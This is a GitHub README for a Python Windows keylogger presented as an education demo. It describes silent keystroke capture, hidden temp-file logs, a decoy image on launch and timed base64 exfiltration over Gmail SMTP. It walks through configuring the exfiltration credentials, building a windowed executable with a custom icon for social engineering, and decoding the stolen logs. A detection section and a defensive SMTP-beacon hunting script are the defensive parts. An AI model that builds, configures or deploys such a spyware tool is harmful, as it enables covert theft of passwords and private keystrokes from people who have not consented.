Dawn-Fighter/Keylogger

Keylogger — Windows Keystroke Capture & Exfiltration Demo

A Python-based keylogger built to demonstrate how keystroke capture and data exfiltration work at a technical level. Written for malware research, security awareness training, and understanding attacker techniques in controlled lab environments.

⚠️ Authorized use only. Running this on any system without explicit written consent is illegal. This is a research and education tool — treat it accordingly.


What It Does

  • Captures all keystrokes using pynput
  • Stores logs in an obfuscated temp file with a randomized filename
  • Encodes logs in base64 and exfiltrates via Gmail SMTP on a randomized timer (200–450s)
  • Displays a decoy image on launch while running silently in the background
  • Can be compiled to a standalone .exe with PyInstaller for lab deployment testing

Technical Overview

| Component | Implementation |
|---|---|
| Keystroke capture | pynput.keyboard.Listener |
| Log storage | Randomized .dat file in %TEMP% |
| Encoding | Base64 via base64 module |
| Exfiltration | SMTP over Gmail with App Password auth |
| Persistence trigger | Background thread, timer-based flush |
| Decoy | PIL.Image display on launch |

Setup

git clone https://github.com/Dawn-Fighter/Keylogger.git
cd Keylogger
pip install pynput pillow

Configure Email Exfiltration

Open keylogger.py and set your credentials in the tx() function:

s  = "sender@gmail.com"         # sending address
r  = "receiver@gmail.com"       # receiving address
pw = "xxxx xxxx xxxx xxxx"      # Gmail App Password (not your main password)

To get a Gmail App Password: Google Account → Security → 2-Step Verification → App Passwords.

Add Decoy Image

Place any image as walpaper.jpg in the same directory as main.py, or update the filename in the script.


Usage

# Run directly
python main.py

Decoy image flashes briefly, then the logger runs silently. Logs are flushed and emailed every 200–450 seconds. Kill via Task Manager or Ctrl+C.

Build as Executable (Lab Testing)

pip install pyinstaller
pyinstaller --onefile --windowed --add-data "walpaper.jpg;." keylogger.py

Output lands in dist/. Add --icon=youricon.ico to set a custom icon for social engineering simulations.


Decoding Captured Logs

Exfiltrated .dat attachments are base64-encoded. Decode with:

# Windows
certutil -decode yourfile.dat output.txt

# Linux / macOS
base64 -d yourfile.dat > output.txt

Detection

Modern AV and EDR solutions will flag this. Tested detections include:

  • Windows Defender — flags on pynput listener pattern
  • Process behavior monitoring — catches SMTP calls from non-browser processes
  • Network-level — SMTP traffic from endpoints without mail clients

This is intentional — part of the educational value is understanding why and how it gets caught.
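The process-behavior and network-level detections listed above can be combined into one hunt, shown here as an added example that is not part of this repository: flag SMTP connections from processes that are not mail clients, and mark those whose spacing matches the 200–450 second flush window. The event tuple layout, the mail-client allowlist, the host names and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime

SMTP_PORTS = {25, 465, 587}                        # standard SMTP and submission ports
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}  # assumed allowlist, tune per site
MIN_GAP, MAX_GAP = 200, 450                        # flush window from the README, seconds

# Constructed sample events: (timestamp, host, process image, destination port).
SUSPECT = r"C:\Users\lab\AppData\Local\Temp\invoice.exe"  # hypothetical lab binary
SAMPLE_EVENTS = [
    ("2024-01-01T10:00:00", "LAB-PC1", SUSPECT, 587),
    ("2024-01-01T10:01:30", "LAB-PC1", SUSPECT, 443),
    ("2024-01-01T10:02:00", "LAB-PC2", r"C:\Program Files\Microsoft Office\OUTLOOK.EXE", 587),
    ("2024-01-01T10:04:10", "LAB-PC1", SUSPECT, 587),
    ("2024-01-01T10:09:00", "LAB-PC3",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 25),
    ("2024-01-01T10:11:00", "LAB-PC1", SUSPECT, 587),
    ("2024-01-01T10:15:20", "LAB-PC1", SUSPECT, 587),
]


def smtp_findings(events, min_hits=3):
    """Return one finding per (host, image) that spoke SMTP without being a
    known mail client. 'timed' is True when there are at least min_hits
    connections and every gap falls inside MIN_GAP..MAX_GAP seconds."""
    seen = defaultdict(list)
    for ts, host, image, port in events:
        name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if port in SMTP_PORTS and name not in MAIL_CLIENTS:
            seen[(host, image)].append(datetime.fromisoformat(ts))

    findings = []
    for (host, image), times in sorted(seen.items()):
        times.sort()
        gaps = [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]
        timed = len(times) >= min_hits and all(MIN_GAP <= g <= MAX_GAP for g in gaps)
        findings.append({"host": host, "image": image, "hits": len(times),
                         "gaps": gaps, "timed": timed})
    return findings


if __name__ == "__main__":
    for f in smtp_findings(SAMPLE_EVENTS):
        level = "HIGH (timed SMTP beacon)" if f["timed"] else "REVIEW (SMTP from non-mail process)"
        print(f"{level}: {f['host']} {f['image']} hits={f['hits']} gaps={f['gaps']}")
```

A single SMTP connection from a non-mail process is still reported, at lower priority, because the cadence check needs several flushes before it can match.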


Disclaimer

Built for malware analysis, blue team training, and understanding offensive techniques. Only deploy in isolated lab environments on systems you own or have written authorization to test. The author assumes no responsibility for misuse.


Author

Chethas Dileep — Penetration Tester & Security Developer

About

This repository contains a simple Python-based keylogger for Windows. It captures keystrokes, logs them to a hidden temporary file, and periodically emails the log using a Gmail account and app password.
